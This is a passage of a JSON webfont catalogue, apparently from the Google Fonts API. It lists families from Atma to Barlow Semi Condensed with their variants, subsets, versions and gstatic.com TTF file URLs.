        "300": "http://fonts.gstatic.com/s/athiti/v5/pe0sMISdLIZIv1wAoDByAv2-C99ycg.ttf",
        "regular": "http://fonts.gstatic.com/s/athiti/v5/pe0vMISdLIZIv1w4DBhWCtaiAg.ttf",
        "500": "http://fonts.gstatic.com/s/athiti/v5/pe0sMISdLIZIv1wA-DFyAv2-C99ycg.ttf",
        "600": "http://fonts.gstatic.com/s/athiti/v5/pe0sMISdLIZIv1wA1DZyAv2-C99ycg.ttf",
        "700": "http://fonts.gstatic.com/s/athiti/v5/pe0sMISdLIZIv1wAsDdyAv2-C99ycg.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Atma",
      "variants": [
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "bengali",
        "latin",
        "latin-ext"
      ],
      "version": "v6",
      "lastModified": "2020-07-23",
      "files": {
        "300": "http://fonts.gstatic.com/s/atma/v6/uK_z4rqWc-Eoo8JzKjc9PvedRkM.ttf",
        "regular": "http://fonts.gstatic.com/s/atma/v6/uK_84rqWc-Eom25bDj8WIv4.ttf",
        "500": "http://fonts.gstatic.com/s/atma/v6/uK_z4rqWc-Eoo5pyKjc9PvedRkM.ttf",
        "600": "http://fonts.gstatic.com/s/atma/v6/uK_z4rqWc-Eoo7Z1Kjc9PvedRkM.ttf",
        "700": "http://fonts.gstatic.com/s/atma/v6/uK_z4rqWc-Eoo9J0Kjc9PvedRkM.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Atomic Age",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v13",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/atomicage/v13/f0Xz0eug6sdmRFkYZZGL58Ht9a8GYeA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Aubrey",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v13",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/aubrey/v13/q5uGsou7NPBw-p7vugNsCxVEgA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Audiowide",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/audiowide/v9/l7gdbjpo0cum0ckerWCtkQXPExpQBw.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Autour One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/autourone/v10/UqyVK80cP25l3fJgbdfbk5lWVscxdKE.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Average",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/average/v9/fC1hPYBHe23MxA7rIeJwVWytTyk.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Average Sans",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/averagesans/v9/1Ptpg8fLXP2dlAXR-HlJJNJPBdqazVoK4A.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Averia Gruesa Libre",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/averiagruesalibre/v9/NGSov4nEGEktOaDRKsY-1dhh8eEtIx3ZUmmJw0SLRA8.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Averia Libre",
      "variants": [
        "300",
        "300italic",
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "300": "http://fonts.gstatic.com/s/averialibre/v9/2V0FKIcMGZEnV6xygz7eNjEarovtb07t-pQgTw.ttf",
        "300italic": "http://fonts.gstatic.com/s/averialibre/v9/2V0HKIcMGZEnV6xygz7eNjESAJFhbUTp2JEwT4Sk.ttf",
        "regular": "http://fonts.gstatic.com/s/averialibre/v9/2V0aKIcMGZEnV6xygz7eNjEiAqPJZ2Xx8w.ttf",
        "italic": "http://fonts.gstatic.com/s/averialibre/v9/2V0EKIcMGZEnV6xygz7eNjESAKnNRWDh8405.ttf",
        "700": "http://fonts.gstatic.com/s/averialibre/v9/2V0FKIcMGZEnV6xygz7eNjEavoztb07t-pQgTw.ttf",
        "700italic": "http://fonts.gstatic.com/s/averialibre/v9/2V0HKIcMGZEnV6xygz7eNjESAJFxakTp2JEwT4Sk.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Averia Sans Libre",
      "variants": [
        "300",
        "300italic",
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "300": "http://fonts.gstatic.com/s/averiasanslibre/v9/ga6SaxZG_G5OvCf_rt7FH3B6BHLMEd3lMKcQJZP1LmD9.ttf",
        "300italic": "http://fonts.gstatic.com/s/averiasanslibre/v9/ga6caxZG_G5OvCf_rt7FH3B6BHLMEdVLKisSL5fXK3D9qtg.ttf",
        "regular": "http://fonts.gstatic.com/s/averiasanslibre/v9/ga6XaxZG_G5OvCf_rt7FH3B6BHLMEeVJGIMYDo_8.ttf",
        "italic": "http://fonts.gstatic.com/s/averiasanslibre/v9/ga6RaxZG_G5OvCf_rt7FH3B6BHLMEdVLEoc6C5_8N3k.ttf",
        "700": "http://fonts.gstatic.com/s/averiasanslibre/v9/ga6SaxZG_G5OvCf_rt7FH3B6BHLMEd31N6cQJZP1LmD9.ttf",
        "700italic": "http://fonts.gstatic.com/s/averiasanslibre/v9/ga6caxZG_G5OvCf_rt7FH3B6BHLMEdVLKjsVL5fXK3D9qtg.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Averia Serif Libre",
      "variants": [
        "300",
        "300italic",
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "300": "http://fonts.gstatic.com/s/averiaseriflibre/v10/neIVzD2ms4wxr6GvjeD0X88SHPyX2xYGCSmqwacqdrKvbQ.ttf",
        "300italic": "http://fonts.gstatic.com/s/averiaseriflibre/v10/neIbzD2ms4wxr6GvjeD0X88SHPyX2xYOpzMmw60uVLe_bXHq.ttf",
        "regular": "http://fonts.gstatic.com/s/averiaseriflibre/v10/neIWzD2ms4wxr6GvjeD0X88SHPyX2xY-pQGOyYw2fw.ttf",
        "italic": "http://fonts.gstatic.com/s/averiaseriflibre/v10/neIUzD2ms4wxr6GvjeD0X88SHPyX2xYOpwuK64kmf6u2.ttf",
        "700": "http://fonts.gstatic.com/s/averiaseriflibre/v10/neIVzD2ms4wxr6GvjeD0X88SHPyX2xYGGS6qwacqdrKvbQ.ttf",
        "700italic": "http://fonts.gstatic.com/s/averiaseriflibre/v10/neIbzD2ms4wxr6GvjeD0X88SHPyX2xYOpzM2xK0uVLe_bXHq.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "B612",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v5",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/b612/v5/3JnySDDxiSz32jm4GDigUXw.ttf",
        "italic": "http://fonts.gstatic.com/s/b612/v5/3Jn8SDDxiSz36juyHBqlQXwdVw.ttf",
        "700": "http://fonts.gstatic.com/s/b612/v5/3Jn9SDDxiSz34oWXPDCLTXUETuE.ttf",
        "700italic": "http://fonts.gstatic.com/s/b612/v5/3Jn_SDDxiSz36juKoDWBSVcBXuFb0Q.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "B612 Mono",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v5",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/b612mono/v5/kmK_Zq85QVWbN1eW6lJl1wTcquRTtg.ttf",
        "italic": "http://fonts.gstatic.com/s/b612mono/v5/kmK5Zq85QVWbN1eW6lJV1Q7YiOFDtqtf.ttf",
        "700": "http://fonts.gstatic.com/s/b612mono/v5/kmK6Zq85QVWbN1eW6lJdayv4os9Pv7JGSg.ttf",
        "700italic": "http://fonts.gstatic.com/s/b612mono/v5/kmKkZq85QVWbN1eW6lJV1TZkp8VLnbdWSg4x.ttf"
      },
      "category": "monospace",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Bad Script",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/badscript/v9/6NUT8F6PJgbFWQn47_x7lOwuzd1AZtw.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Bahiana",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v5",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/bahiana/v5/uU9PCBUV4YenPWJU7xPb3vyHmlI.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Bahianita",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v3",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/bahianita/v3/yYLr0hTb3vuqqsBUgxWtxTvV2NJPcA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Bai Jamjuree",
      "variants": [
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "thai",
        "vietnamese"
      ],
      "version": "v4",
      "lastModified": "2020-09-02",
      "files": {
        "200": "http://fonts.gstatic.com/s/baijamjuree/v4/LDIqapSCOBt_aeQQ7ftydoa0kePuk5A1-yiSgA.ttf",
        "200italic": "http://fonts.gstatic.com/s/baijamjuree/v4/LDIoapSCOBt_aeQQ7ftydoa8W_oGkpox2S2CgOva.ttf",
        "300": "http://fonts.gstatic.com/s/baijamjuree/v4/LDIqapSCOBt_aeQQ7ftydoa09eDuk5A1-yiSgA.ttf",
        "300italic": "http://fonts.gstatic.com/s/baijamjuree/v4/LDIoapSCOBt_aeQQ7ftydoa8W_pikZox2S2CgOva.ttf",
        "regular": "http://fonts.gstatic.com/s/baijamjuree/v4/LDI1apSCOBt_aeQQ7ftydoaMWcjKm7sp8g.ttf",
        "italic": "http://fonts.gstatic.com/s/baijamjuree/v4/LDIrapSCOBt_aeQQ7ftydoa8W8LOub458jGL.ttf",
        "500": "http://fonts.gstatic.com/s/baijamjuree/v4/LDIqapSCOBt_aeQQ7ftydoa0reHuk5A1-yiSgA.ttf",
        "500italic": "http://fonts.gstatic.com/s/baijamjuree/v4/LDIoapSCOBt_aeQQ7ftydoa8W_o6kJox2S2CgOva.ttf",
        "600": "http://fonts.gstatic.com/s/baijamjuree/v4/LDIqapSCOBt_aeQQ7ftydoa0gebuk5A1-yiSgA.ttf",
        "600italic": "http://fonts.gstatic.com/s/baijamjuree/v4/LDIoapSCOBt_aeQQ7ftydoa8W_oWl5ox2S2CgOva.ttf",
        "700": "http://fonts.gstatic.com/s/baijamjuree/v4/LDIqapSCOBt_aeQQ7ftydoa05efuk5A1-yiSgA.ttf",
        "700italic": "http://fonts.gstatic.com/s/baijamjuree/v4/LDIoapSCOBt_aeQQ7ftydoa8W_pylpox2S2CgOva.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Baloo 2",
      "variants": [
        "regular",
        "500",
        "600",
        "700",
        "800"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v1",
      "lastModified": "2020-03-06",
      "files": {
        "regular": "http://fonts.gstatic.com/s/baloo2/v1/wXKrE3kTposypRyd11_WAewrhXY.ttf",
        "500": "http://fonts.gstatic.com/s/baloo2/v1/wXKuE3kTposypRyd76v_JeQAmX8yrdk.ttf",
        "600": "http://fonts.gstatic.com/s/baloo2/v1/wXKuE3kTposypRyd74f4JeQAmX8yrdk.ttf",
        "700": "http://fonts.gstatic.com/s/baloo2/v1/wXKuE3kTposypRyd7-P5JeQAmX8yrdk.ttf",
        "800": "http://fonts.gstatic.com/s/baloo2/v1/wXKuE3kTposypRyd7__6JeQAmX8yrdk.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Baloo Bhai 2",
      "variants": [
        "regular",
        "500",
        "600",
        "700",
        "800"
      ],
      "subsets": [
        "gujarati",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v1",
      "lastModified": "2020-03-06",
      "files": {
        "regular": "http://fonts.gstatic.com/s/baloobhai2/v1/sZlDdRSL-z1VEWZ4YNA7Y5I3cdTmiH1gFQ.ttf",
        "500": "http://fonts.gstatic.com/s/baloobhai2/v1/sZlcdRSL-z1VEWZ4YNA7Y5IPhf3CgFZ8HNV3Nw.ttf",
        "600": "http://fonts.gstatic.com/s/baloobhai2/v1/sZlcdRSL-z1VEWZ4YNA7Y5IPqfrCgFZ8HNV3Nw.ttf",
        "700": "http://fonts.gstatic.com/s/baloobhai2/v1/sZlcdRSL-z1VEWZ4YNA7Y5IPzfvCgFZ8HNV3Nw.ttf",
        "800": "http://fonts.gstatic.com/s/baloobhai2/v1/sZlcdRSL-z1VEWZ4YNA7Y5IP0fjCgFZ8HNV3Nw.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Baloo Bhaina 2",
      "variants": [
        "regular",
        "500",
        "600",
        "700",
        "800"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "oriya",
        "vietnamese"
      ],
      "version": "v1",
      "lastModified": "2020-03-06",
      "files": {
        "regular": "http://fonts.gstatic.com/s/baloobhaina2/v1/qWczB6yyq4P9Adr3RtoX1q6yShz7mDUoupoI.ttf",
        "500": "http://fonts.gstatic.com/s/baloobhaina2/v1/qWcwB6yyq4P9Adr3RtoX1q6ySiQPsREgkYYBX_3F.ttf",
        "600": "http://fonts.gstatic.com/s/baloobhaina2/v1/qWcwB6yyq4P9Adr3RtoX1q6ySiQjthEgkYYBX_3F.ttf",
        "700": "http://fonts.gstatic.com/s/baloobhaina2/v1/qWcwB6yyq4P9Adr3RtoX1q6ySiRHtxEgkYYBX_3F.ttf",
        "800": "http://fonts.gstatic.com/s/baloobhaina2/v1/qWcwB6yyq4P9Adr3RtoX1q6ySiRbtBEgkYYBX_3F.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Baloo Chettan 2",
      "variants": [
        "regular",
        "500",
        "600",
        "700",
        "800"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "malayalam",
        "vietnamese"
      ],
      "version": "v1",
      "lastModified": "2020-03-06",
      "files": {
        "regular": "http://fonts.gstatic.com/s/baloochettan2/v1/vm8udRbmXEva26PK-NtuX4ynWEzf4P17OpYDlg.ttf",
        "500": "http://fonts.gstatic.com/s/baloochettan2/v1/vm8rdRbmXEva26PK-NtuX4ynWEznFNRfMr0fn5bhCA.ttf",
        "600": "http://fonts.gstatic.com/s/baloochettan2/v1/vm8rdRbmXEva26PK-NtuX4ynWEznONNfMr0fn5bhCA.ttf",
        "700": "http://fonts.gstatic.com/s/baloochettan2/v1/vm8rdRbmXEva26PK-NtuX4ynWEznXNJfMr0fn5bhCA.ttf",
        "800": "http://fonts.gstatic.com/s/baloochettan2/v1/vm8rdRbmXEva26PK-NtuX4ynWEznQNFfMr0fn5bhCA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Baloo Da 2",
      "variants": [
        "regular",
        "500",
        "600",
        "700",
        "800"
      ],
      "subsets": [
        "bengali",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v1",
      "lastModified": "2020-03-06",
      "files": {
        "regular": "http://fonts.gstatic.com/s/balooda2/v1/2-ci9J9j0IaUMQZwAJyJcu7XoZFDf2Q.ttf",
        "500": "http://fonts.gstatic.com/s/balooda2/v1/2-ch9J9j0IaUMQZwAJyJShr-hZloY23zejE.ttf",
        "600": "http://fonts.gstatic.com/s/balooda2/v1/2-ch9J9j0IaUMQZwAJyJSjb5hZloY23zejE.ttf",
        "700": "http://fonts.gstatic.com/s/balooda2/v1/2-ch9J9j0IaUMQZwAJyJSlL4hZloY23zejE.ttf",
        "800": "http://fonts.gstatic.com/s/balooda2/v1/2-ch9J9j0IaUMQZwAJyJSk77hZloY23zejE.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Baloo Paaji 2",
      "variants": [
        "regular",
        "500",
        "600",
        "700",
        "800"
      ],
      "subsets": [
        "gurmukhi",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v1",
      "lastModified": "2020-03-06",
      "files": {
        "regular": "http://fonts.gstatic.com/s/baloopaaji2/v1/i7dMIFFzbz-QHZUdV9_UGWZuYFKQHwyVd3U.ttf",
        "500": "http://fonts.gstatic.com/s/baloopaaji2/v1/i7dRIFFzbz-QHZUdV9_UGWZuWKa5OwS-a3yGe9E.ttf",
        "600": "http://fonts.gstatic.com/s/baloopaaji2/v1/i7dRIFFzbz-QHZUdV9_UGWZuWIq-OwS-a3yGe9E.ttf",
        "700": "http://fonts.gstatic.com/s/baloopaaji2/v1/i7dRIFFzbz-QHZUdV9_UGWZuWO6_OwS-a3yGe9E.ttf",
        "800": "http://fonts.gstatic.com/s/baloopaaji2/v1/i7dRIFFzbz-QHZUdV9_UGWZuWPK8OwS-a3yGe9E.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Baloo Tamma 2",
      "variants": [
        "regular",
        "500",
        "600",
        "700",
        "800"
      ],
      "subsets": [
        "kannada",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v1",
      "lastModified": "2020-03-06",
      "files": {
        "regular": "http://fonts.gstatic.com/s/balootamma2/v1/vEFX2_hCAgcR46PaajtrYlBbT0g21tqeR7c.ttf",
        "500": "http://fonts.gstatic.com/s/balootamma2/v1/vEFK2_hCAgcR46PaajtrYlBbd7wf8tK1W77HtMo.ttf",
        "600": "http://fonts.gstatic.com/s/balootamma2/v1/vEFK2_hCAgcR46PaajtrYlBbd5AY8tK1W77HtMo.ttf",
        "700": "http://fonts.gstatic.com/s/balootamma2/v1/vEFK2_hCAgcR46PaajtrYlBbd_QZ8tK1W77HtMo.ttf",
        "800": "http://fonts.gstatic.com/s/balootamma2/v1/vEFK2_hCAgcR46PaajtrYlBbd-ga8tK1W77HtMo.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Baloo Tammudu 2",
      "variants": [
        "regular",
        "500",
        "600",
        "700",
        "800"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "telugu",
        "vietnamese"
      ],
      "version": "v1",
      "lastModified": "2020-03-06",
      "files": {
        "regular": "http://fonts.gstatic.com/s/balootammudu2/v1/1Pt2g8TIS_SAmkLguUdFP8UaJcK-xXEW6aGXHw.ttf",
        "500": "http://fonts.gstatic.com/s/balootammudu2/v1/1Ptzg8TIS_SAmkLguUdFP8UaJcKGMVgy4YqLFrUnJA.ttf",
        "600": "http://fonts.gstatic.com/s/balootammudu2/v1/1Ptzg8TIS_SAmkLguUdFP8UaJcKGHV8y4YqLFrUnJA.ttf",
        "700": "http://fonts.gstatic.com/s/balootammudu2/v1/1Ptzg8TIS_SAmkLguUdFP8UaJcKGeV4y4YqLFrUnJA.ttf",
        "800": "http://fonts.gstatic.com/s/balootammudu2/v1/1Ptzg8TIS_SAmkLguUdFP8UaJcKGZV0y4YqLFrUnJA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Baloo Thambi 2",
      "variants": [
        "regular",
        "500",
        "600",
        "700",
        "800"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "tamil",
        "vietnamese"
      ],
      "version": "v1",
      "lastModified": "2020-03-06",
      "files": {
        "regular": "http://fonts.gstatic.com/s/baloothambi2/v1/cY9cfjeOW0NHpmOQXranrbDyu4hHBJOxZQPp.ttf",
        "500": "http://fonts.gstatic.com/s/baloothambi2/v1/cY9ffjeOW0NHpmOQXranrbDyu7CzLbe5Th_gRA7L.ttf",
        "600": "http://fonts.gstatic.com/s/baloothambi2/v1/cY9ffjeOW0NHpmOQXranrbDyu7CfKre5Th_gRA7L.ttf",
        "700": "http://fonts.gstatic.com/s/baloothambi2/v1/cY9ffjeOW0NHpmOQXranrbDyu7D7K7e5Th_gRA7L.ttf",
        "800": "http://fonts.gstatic.com/s/baloothambi2/v1/cY9ffjeOW0NHpmOQXranrbDyu7DnKLe5Th_gRA7L.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Balsamiq Sans",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext"
      ],
      "version": "v2",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/balsamiqsans/v2/P5sEzZiAbNrN8SB3lQQX7Pnc8dkdIYdNHzs.ttf",
        "italic": "http://fonts.gstatic.com/s/balsamiqsans/v2/P5sazZiAbNrN8SB3lQQX7PncwdsXJaVIDzvcXA.ttf",
        "700": "http://fonts.gstatic.com/s/balsamiqsans/v2/P5sZzZiAbNrN8SB3lQQX7PncyWUyBY9mAzLFRQI.ttf",
        "700italic": "http://fonts.gstatic.com/s/balsamiqsans/v2/P5sfzZiAbNrN8SB3lQQX7PncwdsvmYpsBxDAVQI4aA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Balthazar",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/balthazar/v10/d6lKkaajS8Gm4CVQjFEvyRTo39l8hw.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Bangers",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v13",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/bangers/v13/FeVQS0BTqb0h60ACL5la2bxii28.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Barlow",
      "variants": [
        "100",
        "100italic",
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic",
        "800",
        "800italic",
        "900",
        "900italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v5",
      "lastModified": "2020-09-10",
      "files": {
        "100": "http://fonts.gstatic.com/s/barlow/v5/7cHrv4kjgoGqM7E3b8s8yn4hnCci.ttf",
        "100italic": "http://fonts.gstatic.com/s/barlow/v5/7cHtv4kjgoGqM7E_CfNYwHoDmTcibrA.ttf",
        "200": "http://fonts.gstatic.com/s/barlow/v5/7cHqv4kjgoGqM7E3w-oc4FAtlT47dw.ttf",
        "200italic": "http://fonts.gstatic.com/s/barlow/v5/7cHsv4kjgoGqM7E_CfP04Voptzsrd6m9.ttf",
        "300": "http://fonts.gstatic.com/s/barlow/v5/7cHqv4kjgoGqM7E3p-kc4FAtlT47dw.ttf",
        "300italic": "http://fonts.gstatic.com/s/barlow/v5/7cHsv4kjgoGqM7E_CfOQ4loptzsrd6m9.ttf",
        "regular": "http://fonts.gstatic.com/s/barlow/v5/7cHpv4kjgoGqM7EPC8E46HsxnA.ttf",
        "italic": "http://fonts.gstatic.com/s/barlow/v5/7cHrv4kjgoGqM7E_Ccs8yn4hnCci.ttf",
        "500": "http://fonts.gstatic.com/s/barlow/v5/7cHqv4kjgoGqM7E3_-gc4FAtlT47dw.ttf",
        "500italic": "http://fonts.gstatic.com/s/barlow/v5/7cHsv4kjgoGqM7E_CfPI41optzsrd6m9.ttf",
        "600": "http://fonts.gstatic.com/s/barlow/v5/7cHqv4kjgoGqM7E30-8c4FAtlT47dw.ttf",
        "600italic": "http://fonts.gstatic.com/s/barlow/v5/7cHsv4kjgoGqM7E_CfPk5Foptzsrd6m9.ttf",
        "700": "http://fonts.gstatic.com/s/barlow/v5/7cHqv4kjgoGqM7E3t-4c4FAtlT47dw.ttf",
        "700italic": "http://fonts.gstatic.com/s/barlow/v5/7cHsv4kjgoGqM7E_CfOA5Voptzsrd6m9.ttf",
        "800": "http://fonts.gstatic.com/s/barlow/v5/7cHqv4kjgoGqM7E3q-0c4FAtlT47dw.ttf",
        "800italic": "http://fonts.gstatic.com/s/barlow/v5/7cHsv4kjgoGqM7E_CfOc5loptzsrd6m9.ttf",
        "900": "http://fonts.gstatic.com/s/barlow/v5/7cHqv4kjgoGqM7E3j-wc4FAtlT47dw.ttf",
        "900italic": "http://fonts.gstatic.com/s/barlow/v5/7cHsv4kjgoGqM7E_CfO451optzsrd6m9.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Barlow Condensed",
      "variants": [
        "100",
        "100italic",
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic",
        "800",
        "800italic",
        "900",
        "900italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v5",
      "lastModified": "2020-09-10",
      "files": {
        "100": "http://fonts.gstatic.com/s/barlowcondensed/v5/HTxxL3I-JCGChYJ8VI-L6OO_au7B43LT31vytKgbaw.ttf",
        "100italic": "http://fonts.gstatic.com/s/barlowcondensed/v5/HTxzL3I-JCGChYJ8VI-L6OO_au7B6xTru1H2lq0La6JN.ttf",
        "200": "http://fonts.gstatic.com/s/barlowcondensed/v5/HTxwL3I-JCGChYJ8VI-L6OO_au7B497y_3HcuKECcrs.ttf",
        "200italic": "http://fonts.gstatic.com/s/barlowcondensed/v5/HTxyL3I-JCGChYJ8VI-L6OO_au7B6xTrF3DWvIMHYrtUxg.ttf",
        "300": "http://fonts.gstatic.com/s/barlowcondensed/v5/HTxwL3I-JCGChYJ8VI-L6OO_au7B47rx_3HcuKECcrs.ttf",
        "300italic": "http://fonts.gstatic.com/s/barlowcondensed/v5/HTxyL3I-JCGChYJ8VI-L6OO_au7B6xTrc3PWvIMHYrtUxg.ttf",
        "regular": "http://fonts.gstatic.com/s/barlowcondensed/v5/HTx3L3I-JCGChYJ8VI-L6OO_au7B2xbZ23n3pKg.ttf",
        "italic": "http://fonts.gstatic.com/s/barlowcondensed/v5/HTxxL3I-JCGChYJ8VI-L6OO_au7B6xTT31vytKgbaw.ttf",
        "500": "http://fonts.gstatic.com/s/barlowcondensed/v5/HTxwL3I-JCGChYJ8VI-L6OO_au7B4-Lw_3HcuKECcrs.ttf",
        "500italic": "http://fonts.gstatic.com/s/barlowcondensed/v5/HTxyL3I-JCGChYJ8VI-L6OO_au7B6xTrK3LWvIMHYrtUxg.ttf",
        "600": "http://fonts.gstatic.com/s/barlowcondensed/v5/HTxwL3I-JCGChYJ8VI-L6OO_au7B4873_3HcuKECcrs.ttf",
        "600italic": "http://fonts.gstatic.com/s/barlowcondensed/v5/HTxyL3I-JCGChYJ8VI-L6OO_au7B6xTrB3XWvIMHYrtUxg.ttf",
        "700": "http://fonts.gstatic.com/s/barlowcondensed/v5/HTxwL3I-JCGChYJ8VI-L6OO_au7B46r2_3HcuKECcrs.ttf",
        "700italic": "http://fonts.gstatic.com/s/barlowcondensed/v5/HTxyL3I-JCGChYJ8VI-L6OO_au7B6xTrY3TWvIMHYrtUxg.ttf",
        "800": "http://fonts.gstatic.com/s/barlowcondensed/v5/HTxwL3I-JCGChYJ8VI-L6OO_au7B47b1_3HcuKECcrs.ttf",
        "800italic": "http://fonts.gstatic.com/s/barlowcondensed/v5/HTxyL3I-JCGChYJ8VI-L6OO_au7B6xTrf3fWvIMHYrtUxg.ttf",
        "900": "http://fonts.gstatic.com/s/barlowcondensed/v5/HTxwL3I-JCGChYJ8VI-L6OO_au7B45L0_3HcuKECcrs.ttf",
        "900italic": "http://fonts.gstatic.com/s/barlowcondensed/v5/HTxyL3I-JCGChYJ8VI-L6OO_au7B6xTrW3bWvIMHYrtUxg.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Barlow Semi Condensed",
      "variants": [
        "100",
        "100italic",
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic",
        "800",
        "800italic",
        "900",
